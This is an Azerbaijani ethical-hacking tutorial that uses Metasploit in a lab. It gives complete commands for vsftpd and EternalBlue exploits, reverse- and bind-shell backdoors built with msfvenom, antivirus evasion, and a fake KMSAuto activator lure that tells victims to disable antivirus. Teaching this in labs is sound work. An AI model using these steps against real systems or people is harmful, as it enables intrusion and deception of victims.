Hacking
April 7, 2023

Etik Hakerlik. 5-ci Hissə

SADIG ALIYEV

Hamıya salamlar dostlar🥷

Bu yazıda biz sistemə giriş əldə etmə mərhələsini öyrənəcəyik və istismarları (exploits), faydalı yükü (faydalı yükü) başa düşəcəyik, həmçinin Metasploit Framework aləti ilə tanış olacağıq.

Metasploit Framework – müxtəlif arxitekturalı proqram təminatı və əməliyyat sistemlərində zəifliklərdən istifadə prosesinin avtomatlaşdırılması üçün hərtərəfli vasitədir.

Metasploit-in bir hissəsi olan modullar bir neçə kateqoriyaya bölünür:

İstismarlar (Exploits)

Bu, proqram təminatındakı boşluqlardan istifadə edən və kompüter sisteminə hücum üçün istifadə olunan proqram, kod parçası və ya əmrlər ardıcıllığıdır. Hücumun məqsədi sistem üzərində nəzarəti ələ keçirmək (imtiyazların yüksəldilməsi), həmçinin onun fəaliyyətini pozmaq (DoS hücumu) ola bilər.

İcra növünə görə iki növ istismarı ayırd etmək olar:

Uzaqdan istismar (Exploits)

Şəbəkə vasitəsilə işləyir və hücuma məruz qalan sistemə əvvəlcədən daxil olmadan təhlükəsizlik zəifliyindən istifadə edir;

Yerli istismar (Exploits)

O, xüsusi olaraq həssas sistemdə işləyir və bu, ona əvvəlcədən giriş tələb edir.

Faydalı yüklər (Payloads)

İstismardan sonra icra olunan kodu təmsil edir. Əsasən qurban və təcavüzkar arasında əlaqə qurmaq üçün istifadə olunur.

Köməkçi modullar (köməkçi) - (auxiliary)

Bunlar xüsusi istismar üçün həssas cihazları şəbəkədə axtara bilən zəiflik skanerləri kimi köməkçi alətlərdir.

Buna görə də, MSF ona nəzarəti əldə etmək və ya onu söndürmək üçün ƏS-də, şəbəkə protokollarında və orada istifadə olunan ayrı-ayrı proqramlarda müxtəlif zəiflik üsullarını axtarmağa və istifadə etməyə imkan verir.

İndi təcrübəyə keçək və bir neçə nümunəni nəzərdən keçirək.

Sistemə giriş əldə etmək

Birincisi, virtual maşını Kali Linux ilə, eləcə də həssas Metasploitable2 maşını ilə işə salırıq — indiyə qədər hər şey həmişəki kimidir.

Metasploit-i işə salmaq üçün konsoldakı əmrdən istifadə edin

msfconsole

və ya onu bütün proqramların siyahısının İstismar Alətləri bölməsində axtarın.

SADIG ALIYEV

Metasploitable2 maşınının son hissəsində biz ftp 2.3.4 xidmətinin köhnəlmiş versiyasını tapdıq, hansı ki, məhz belə zəifliyə malikdir. Hər bir məlum zəiflik haqqında ətraflı məlumatı resursda tapa bilərsiniz:

https://www.exploit-db.com/

Axtarış sahəsinə xidmətin adını və ya zəiflik bülleteninin nömrəsini daxil edə bilərsiniz.

Yuxarıdakı şəkildə gördüyünüz kimi, əgər istismar artıq Metasploit verilənlər bazasındadırsa, bu məlumat mötərizədə adın yanında göstəriləcək. Metasploit verilənlər bazasında tələb olunan istismarı tapmaq üçün əmri daxil edin:

search <exploit adı>
SADIG ALIYEV

İstismar tətbiq etmək üçün əmrdən istifadə edin:

use <siyahıdakı istismar nömrəsi>

Mövcud istismar seçimlərinə baxmaq üçün əmri daxil edin:

show options
SADIG ALIYEV

Burada bizim üçün bir neçə parametr variantı mövcuddur:

RHOSTS - zəiflikdən istifadə etmək üçün uzaq host (burada Metasploitable2 maşınının IP ünvanını göstəririk)

RPORT - burada xidmətin portunu təyin edirik (yalnız qeyri-standart olduqda)

Mənbəyə hücum etmək üçün yalnız 2 əmr daxil etməliyik:

set RHOSTS <hədəf IP ünvanı>
run

və ya

exploit

istismarı idarə etmək üçün.

SADIG ALIYEV

Bir neçə saniyə gözləyirik və uzaq bir qabıq şəklində açıq seans alırıq. Gəlin görək komanda ilə kimin altında qaçırıq:

whoami

Kök istifadəçinin altında oturduğumuz görünə bilər. Bunun bizə lazım olan düzgün host olduğuna əmin olmaq üçün əmrdən istifadə edirik:

ip address
SADIG ALIYEV

İndi biz əmr qabığı ilə işləyirik. Bunun bir çatışmazlığı var - qabıq sistemə başqa bir istifadəçi altında daxil olmağa və ya yenidən daxil olmağa imkan verməyəcək.

Baxaq sistemdə rootdan başqa hansı istifadəçilərimiz var. Sistemdə yaradılmış istifadəçilər haqqında məlumat /etc kataloqunun passwd faylında saxlanılır:

cat /etc/passwd
SADIG ALIYEV

Burada daha çox istifadəçinin olduğunu görürük, məsələn, istifadəçi msfadmin və user. İndi komanda vasitəsilə onlara keçməyə çalışaq:

su <istifadəçi adı>
SADIG ALIYEV

Bunu alır. Digər istifadəçilər kimi daxil olmaq və ya kök kimi yenidən daxil olmaq üçün edilən bütün cəhdlər bizə su əmrinin terminaldan işə salınması barədə mesaj verir. Komanda qabığından terminal rejiminə keçməyin ən asan və effektiv yolu pty python psevdo-terminalından istifadə etməkdir.

Bunu etmək üçün onu aşağıdakı skriptlə işə salın:

python -c ‘import pty; 
pty.spawn(“bin/sh”)’

Pseudo-terminalda eyni hərəkətləri edəcəyik:

SADIG ALIYEV

Terminalda istifadəçilər arasında keçidin heç bir problem olmadan baş verdiyini görmək olar. Ancaq nəzərə alın ki, artıq root kimi daxil olmaq mümkün deyil - parol məlum deyil. Kök istifadəçi kimi işə qayıtmaq üçün cari istifadəçinin sessiyasından komanda ilə çıxmalısınız:

exit

İndi biz şəbəkədə köhnə, lakin indiki EternalBlue və ya MS17-010 kod adlı istismarın tətbiq oluna biləcəyi cihazların olub olmadığını öyrənməliyik. İcra növünə görə bu, uzaqdan istismardır (əvvəllər nəzərdən keçirdiyimiz kimi). Ancaq orada bir maşınla məşğul olduq və burada onlarla var. Prosesi sürətləndirmək üçün şəbəkədəki bütün cihazları skan edəcək və EternalBlue-a həssas olanları axtaracaq xüsusi skan modulu bizə kömək edəcək. İndi bir nümunəyə baxaq.

ƏHƏMİYYƏTLİ! Bu misal üçün Windows Server 2008 R2 və ən son yeniləmələri olan Windows 7 ilə daha 2 maşın hazırlamalıyıq. EternalBlue zəiflikləri, onu düzəldən 2017-ci ilin mart yaması olmayan SMBv1 protokolunun həssas versiyasından istifadə edərək, Micorosoft Windows-un bütün versiyalarına təsir göstərir.

Ən həssas sistemlərin siyahısı:

  • Windows Server 2012 R2 Standard 9600: 352,886
  • Windows Server 2008 R2 Enterprise 7601 Service Pack 1: 111,331
  • Windows Server 2008 R2 Standard 7601 Service Pack 1: 67,761
  • Windows Server 2008 R2 Datacenter 7601 Service Pack 1: 57,295
  • Windows Server 2016 Standard 14393: 53,005
  • Windows Server 2012 R2 Datacenter 9600: 47,122
  • Windows 7 Professional 7601 Service Pack 1: 36,454
  • Windows 7 Ultimate 7601 Service Pack 1: 33,886
  • Windows 10 Home 17134: 29310: 29.310
  • Windows 7 Home Premium 7601 Service Pack 1: 26,781

İndi biz msfconsole-u işə salırıq və eternalblue sözü ilə əlaqəli hər şeyi axtarırıq.

SADIG ALIYEV

Metasploit verilənlər bazasında axtarış bir neçə variant gətirir. Birinci seçim istismarın özüdür, əgər bu zəifliyə malik olsa, bizə maşına uzaqdan giriş imkanı verəcək, lakin biz bir neçə dəqiqə ərzində bütün şəbəkəni skan edə bilən auxiliary/scanner/smb/smb_ms17_010 ilə maraqlanırıq. həssas maşınların tam sıradan çıxması. İşi yoxlayaq. Bunu etmək üçün əmrlə istədiyiniz elementi seçin:

use 3

Və bütün şəbəkəni RHOSTS-də 24-cü maska ​​192.168.1.0/24 ilə skan etmək üçün təyin edin və əmrlə işə salın:

run
SADIG ALIYEV

Öyrəndik ki, skaner həssas maşının IP ünvanını müəyyən edib. Bu, Windows Server 2008-ə əsaslanan serverdir. İndi baxaq biz login və parol olmadan fayl serverinə qoşula bilərikmi?

Təəssüf ki, qoşulma zamanı server autentifikasiya tələb edir.

İndi əmrlə istismarımızı seçirik:

Onun köməyi ilə burada bizim üçün hansı növ faydalı yüklərin olduğunu görək. Sonra əmri tətbiq edirik:

show payloads
SADIG ALIYEV

Siyahı olduqca təsir edicidir, lakin biz əminliklə işləyəcək variantı seçməliyik. Hər faydalı yük təmiz işləyə bilməz. Onların bir çoxu belə bir səhv qaytarır


SADIG ALIYEV

Təcrübəmizi davam etdirmək üçün bir az nəzəriyyəyə nəzər salaq.

bind_tcp bağlantısı, müəyyən bir portda dinləyən hədəfin maşınında prosesin başlandığı hədəflə qarşılıqlı əlaqə növüdür.

Reverse_tcp tipli bir əlaqə hücuma məruz qalan cihazla qarşılıqlı əlaqə növüdür, burada maşındakı proqram prosesinin özü təcavüzkarla əlaqəni işə salır. Bir çox firewall gedən bağlantılara icazə vermək üçün konfiqurasiya edildiyi üçün əks əlaqə firewall filtrindən yan keçmə şansı təqdim edir.

Burada biz payload/windows/x64/meterpreter/bind_tcp seçməliyik, çünki hədəf maşınla birbaşa əlaqə yaratmalıyıq.

Sonra, komanda ilə hədəf maşının ünvanını təyin edin:

set RHOSTS 192.168.1.11

Hücum edilən maşında əməliyyat sisteminin növünü göstərin. Və mövcud hədəfləri görmək üçün əmri daxil edin:

show targets
SADIG ALIYEV

İndi biz istismarın özünü işə salırıq.

SADIG ALIYEV

İstismar uğurla başa çatdı və biz meterpreter seansı əldə etdik.

Beləliklə, indi əmri daxil edirik

shell

Və biz adi əmr qabığını alırıq. İndi Windows əmrlərini yerinə yetirmək imkanımız var. Komanda ilə sistemin qeydiyyatdan keçmiş istifadəçilərinin siyahısını göstərin:

net user

və şəbəkə bağlantısı statistikası:

net stat
SADIG ALIYEV

Kali Linux sisteminin özünün kiril və rus dilində lokallaşdırılması ilə bağlı problem komanda ilə həll olunur:

sudo dpkg-reconfigure locales
SADIG ALIYEV

Və ru_RU.UTF-8 UTF-8 seçin


SADIG ALIYEV
SADIG ALIYEV

Şəbəkə vasitəsilə hədəf hostda zəiflikdən istifadə edən uzaq istismar növünün necə işlədiyinə baxdıq.

İndi maşının yalnız yerli istismara qarşı həssas olduğu vəziyyətə baxaq. Gəlin daha mürəkkəb bir ssenaridə təcrübə edək ki, biz bəzi backdoor və ya troyan yaratmalı və onu hədəf maşında işlətməliyik. Burada hack tətbiq etmək üçün sosial mühəndislik üsullarını tətbiq etməli və qurbanı yerli maşınında icra olunan faylı işə salmağa məcbur etməlisiniz.

Belə hallar üçün Metasploit-in msfvenom kimi ayrı bir modulu var, müxtəlif sistem arxitekturaları üçün faydalı yüklər yaratmaq üçün güclü bir vasitədir.

Ancaq əvvəlcə zərərli proqramlar haqqında bir az nəzəriyyə.

Arxa qapı (backdoor)

Bu zərərli proqram növüdür, onun əsas vəzifəsi uzaq bir cihaza icazəsiz girişi təmin etməkdir.

Trojan

Bu, əsas vəzifəsi özünü qanuni proqram kimi gizlətmək olan zərərli proqramdır. O, həmçinin faydalı yük daşıyır, əksər hallarda arxa qapıdır.

İndi isə Metasploit-də mövcud faydalı yük növlərinə baxaq.

Single - sadə tək əmrləri yerinə yetirən faydalı yük növüdür. O, həmçinin sistemdə yeni istifadəçi yaratmağa və ya icra olunan faylı işə salmağa imkan verir.

Stager - faydalı yük növüdür, əsas vəzifə təcavüzkarın maşını ilə qurbanın maşını arasında şəbəkə bağlantısı yaratmaqdır. Bundan əlavə, mərhələ qoşulduqda sonrakı komponentlər yüklənir.

Stage – Mərhələ tam yüklənməyən, mərhələli və geniş funksionallığa malik yük növüdür. VNC və ya Meterpreter seansı almalı olduğunuz hallarda istifadə olunur. Dezavantaj böyük miqdarda işğal edilmiş RAM-dır (baxmayaraq ki, müasir kompüterlərdə bu, heç də kritik deyil).

Gəlin davam edək və biz bütün eksperimentləri Windows 7 ilə işləyən maşında aparacağıq. O, bütün mövcud təhlükəsizlik yeniləmələrini quraşdıracaq, lakin firewall söndürülüb və antivirus proqramı yoxdur.

Maşını Kali Linux ilə işə salırıq və konsolda əmri daxil edirik:

msfvenom -h

və bütün mövcud modul seçimlərinə baxın

SADIG ALIYEV

Siyahı uzun deyil və faydalı yükü yaratmaq üçün iki bayraq məcburidir:

-p

- payload özü və

-f

— çıxış fayl formatı (məsələn, .exe).

Komandadan istifadə edərək bütün mövcud yükləri sadalayırıq:

msfvenom -l payloads
SADIG ALIYEV

Metasploit verilənlər bazasında müxtəlif platformalar üçün 867 faydalı yük mövcuddur. Hər bir faydalı yükün əvvəlində platformanın adı göstərilir: windows, linux, android, osx və s.

Gəlin ilk yükümüzü yaratmağa başlayaq. Bu windows/meterpreter/bind_tcp olacaq

Komanda bu kimi görünəcək

msfvenom -p windows/meterpreter/bind_tcp -f exe > /home/kali/Desktop/backdoor.exe
SADIG ALIYEV

Nəsil başa çatdıqdan sonra backdoor.exe faylı masaüstündə saxlanacaq. Bu fayl qurbanın kompüterində işə salınarsa, ona giriş 4444 nömrəli portda açılacaq (istəsəniz onu dəyişə bilərsiniz).

Buna görə də, maşına giriş əldə etmək üçün bizə Dinləyici lazımdır - verilmiş portu dinləyəcək və sessiyanı açmağa imkan verən proqram.

Msfconsole-u işə salın və əmri daxil edin:

use exploit/multi/handler

Onun köməyi ilə verilmiş portda dinləmək və uğurlu olarsa sessiya açmaq üçün dinləyici olan bir istismar açılacaq. Orada aşağıdakı parametrləri təyin etməlisiniz:

set payload windows/meterpreter/bind_tcp

- yaradılmış faylda olduğu kimi eyni yükü seçin.

set rhost 192.168.11.149

- hədəf cihazın IP ünvanını göstərin (məqaləni evdə və işdə yazdım, ona görə də şəbəkə dəyişdi, lakin bu işin mahiyyətinə təsir göstərmir, hər halda bu, çox güman ki, sizin üçün fərqli olacaq).

set lport 4444

- Dinləmək üçün portu göstərin.

run

- işə salın və qurbanın hərəkətlərini gözləyin.

SADIG ALIYEV

Faylı qurbana ötürməyin ən sadə yolunu nəzərdən keçirək - Apache veb serverinə əsaslanan fayl hostinq xidməti. Adətən Kali Linux-da əvvəlcədən quraşdırılır, ona görə də onu əmrlə işə salırıq:

systemctl start apache2.service

Və sonra faylı /var/www/html/ qovluğuna köçürün.

SADIG ALIYEV

İndi brauzerdə təcavüzkarın maşınının ünvanı və http://192.168.1.143/backdoor.exe fayl adı ilə linki açaraq faylı hədəf maşından yükləməli və onu işə salmalısınız.

Əlaqəni gözləyən idarəçi ilə pəncərəyə giririk və fayl qurbanın maşınında işə salındıqdan sonra nə baş verdiyini görürük.

SADIG ALIYEV

Şəkildə göstərilir ki, qurban bizim arxa qapımızı işə saldığı anda biz meterpreter seansı açmışıq. Və burada hədəf maşındakı tapşırıq menecerində baş verənlər.

SADIG ALIYEV

Backdoor.exe prosesi digər proseslərin siyahısında görünür. Və proses dayandırılsa, sessiya dərhal dayandırılacaq.

SADIG ALIYEV

Bu halda, msfvenom xüsusi gizli yük növü shell_hidden_bind_tcp təmin edir. Bu faydalı yük Windows əmr qabığına giriş imkanı verir. Bunun sayəsində proses sistemdə gizlənir və menecerdəki tapşırığı silsəniz belə, kəsilməyəcək.

Metodunu daha ətraflı nəzərdən keçirək. Və əvvəlcə başqa bir istismardan istifadə etmək üçün işləyicini yenidən konfiqurasiya edin

set payload windows/shell_hidden_bind_tcp 
set rhost 192.168.11.149
set ahost 192.168.11.143

Burada təcavüzkarın icazə verilən IP ünvanını təyin edirik.

set lport
4444 run

Shell əmri ilə işləyərkən, Kali-yə daxil olan alternativ bir vasitə Netcat yardım proqramıdır. Orada qısa bir əmr yazmağımız kifayət edəcəkdir:

nc 192.168.11.149 4444

Və qurbanın tərəfində yükün icrasını gözləyirik.

Gəlin işləyici seçiminə diqqət edək və yeni istismar yaradaq:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.11.143 lport=4444 -f exe > /home/kali/Desktop/hidden-backdoor.exe

Sonra faylı serverimizə köçürür və hədəf maşındakı brauzerdən yükləyirik.

Tapşırıq menecerində hidden-backdoor.exe prosesini bitirdikdə nə dəyişəcək.

Eyni cihazdan iki aktiv seans çıxır (biri işləyici vasitəsilə, ikincisi Netcat vasitəsilə işləyir).

Birbaşa əlaqələrlə hər şey aydındır, ona görə də tapşırığı bir az çətinləşdirək. Bunun üçün biz Windows təhlükəsizlik duvarımızı işə salırıq, yəni fayl firewall istisnalarına əlavə olunmayınca bind_tcp seçimi işləməyəcək. Bu vəziyyətdə, reverse_tcp bizə kömək edəcək, bunun sayəsində qaz daxil olan əlaqələrin bloklanmasını keçə biləcəkdir.

Prosesi sürətləndirmək üçün işləyici əvəzinə Netcat yardım proqramından istifadə edirik:

nc -lvp 4444

Rahatlıq üçün bir fayl yaradırıq, onu dərhal / var / www / html qovluğuna yükləyirik

msfvenom -p windows/shell_reverse_tcp lhost=192.168.11.143 lport=4444 -f exe > /var/www/html/reverse-shell.exe

Faylı qurban maşınına endirin və işə salın:

İndi biz firewall aktivləşdirilmiş bind_tcp tipli əlaqə ilə əvvəlki fayllardan birini işə salırıq

İndi firewall bizə şəbəkə bağlantısını başlatmaq istəyən bir proqram olduğunu bildirir.

İstismarımız işləyəcək, lakin bu nəticəni əldə edirik:

Bu vəziyyətdə uzaq bir qabıq almayacağıq. Buradan belə nəticə çıxır ki, firewallun uzaq hostda işlədiyinə əmin olmadığımız bütün hallarda reverse_tcp istifadə etməyə dəyər.

İndi hədəf maşında antivirusun quraşdırıldığı vəziyyətə baxaq.

Bunu etmək üçün maşına antivirus quraşdırın və hidden-backdoor.exe faylına nə baş verdiyinə baxın. Bunu etmək üçün ən populyar pulsuz antivirus seçin.

Biz bunu götürürük - 5 ulduz üçün 360 Total Security. Yükləyin və quraşdırdıqdan sonra "Yükləmələr" qovluğunu skan edin və nəticəyə baxın.

Burada antivirusun yüklənmiş faylda təhlükə aşkarladığını görürük.

İndi qəzəblənək, faydalı yükü antivirus proqramından gizlətmək mümkün olacaqmı?

Metasploit-də antivirus proqramından yan keçməyin ən təsirli yolu shikata ga nai kodlayıcısından istifadə edərək gizli faydalı yük yaratmaq idi. Metod polimorf aşqar XOR kodlayıcısı sayəsində işləyir və shellcode kodlaşdırma prosesinin hər iterasiyası ilə fərqli şəkildə baş verəcək - yük görünüşdə antivirus üçün təhlükəsiz olur.

Başqa kodlayıcılar var, mövcud kodlayıcıların bütün siyahısını komanda ilə yoxlaya bilərsiniz:

msfvenom --list encoders
SADIG ALIYEV

İndi belə bir ssenarinin hələ də mümkün olub olmadığını yoxlayaq.

Bunu etmək üçün bir şablon hazırlayacağıq (bu, Windows aktivləşdirici faylı olacaq), faydalı yükü ona daxil edəcəyik, shikata_ga_nai istifadə edərək kodlaşdıracağıq, sonra virustotal.com resursunda maskalanma etibarlılığının nəticəsini yoxlayacağıq.

Gəlin buna sosial mühəndisliyi də əlavə edək: biz faylımızı parolla qorunan arxivə yığacağıq və README.txt faylını ona əlavə edəcəyik. Sonda arxivi parol ilə fayl paylaşma xidmətinə köçürəcəyik və qurbanın onu yükləməsini gözləyəcəyik.

Aşağıdakı əmri daha yaxşı başa düşmək üçün parametrlərə nəzər salaq:

-a

<arch> təlimat dəsti arxitekturası (x86/x64);

--platform

<platform> hədəf platformanı seçin (bizim halda, pəncərələr);

-p

<payload> - faydalı yükün özü (bizim halda windows/meterpreter/reverse_tcp);

-e

<encoder> - kodlayıcı seçimi;

-i

<count> - kodlaşdırma iterasiyalarının sayı;

-k

<keep> - orijinal şablonun bütün orijinal xassələrini saxlamağa imkan verən parametr;

-x

<path> - şablona gedən yol (qanuni proqram təminatının icra olunan faylı);

-f

<format> - nəsil formatı, raw, exe, elf, jar, py və s. ola bilər. (Bütün mövcud formatlara baxmaq üçün --help-formats əmrindən istifadə edə bilərsiniz).

Beləliklə, faydalı yükü yaratmağa başlayaq:

msfvenom -a x86 --platform 
windows -p windows/shell_reverse_tcp 
lhost=192.168.11.143 lport=4444 -e 
x86/shikata_ga_nai -i 20 -f exe -k -x 
/home/kali/Downloads/putty.exe > 
KMSAuto.exe

Faylı virustotal.com saytına yükləyin və yoxlayın:

SADIG ALIYEV

Gördüyümüz kimi, nəticə pisdir. Antivirusların əksəriyyəti təhlükəni aşkar etdi. Buna görə də, sosial mühəndislik üsulları olmadan, bu faylı qurbana ovuclamaq və antivirusu söndürməyə inandırmaq olmaz.

İndi faylın hostinq kataloqunda README.txt mətn faylını yaradaq və KMSAuto qovluğunu əlavə edək, burada faydalı yükü və README.txt faylını kopyalayacağıq. Bunu etmək üçün əmrləri yerinə yetirin:

Sonra zip yardım proqramından istifadə edirik və bütün fayllarla birlikdə KMSAuto qovluğunu parolla qorunan 11111 arxivinə əlavə edirik.

Virustotal-da arxivi yoxlayaq və nəticələri müqayisə edək:

Burada vəziyyət artıq fərqlidir - bu metodun üstünlüyü var, antivirus arxivdə olduğu müddətcə faylı skan etməyə başlaya bilməyəcək. Antivirusun yoxlanılması:

Hər şey düzəldi - antivirus faylı skan etdi və heç bir təhlükə tapmadı. Bundan sonra istifadəçi antivirusdan bildiriş görsə belə, o, README.txt faylının məzmununu oxuyacaq və aktivləşmə müddəti ərzində antivirusunu söndürəcək.

Faylı işə saldıqdan sonra Netcat-ın uzaq bir qabıq aldığını görürük.


Bu hissədə biz əsas funksiyalar, alətlər və sosial mühəndislikdən istifadə edərək sistemi necə çəkə biləcəyinizlə bağlı çox sadə bir nümunəyə baxdıq.


​​​​​​​🔥 Məqaləni bəyəndinizsə, reaksiya bildirin

​​​​​​​​​​​​⚡️ Yazın - SADIG ALIYEV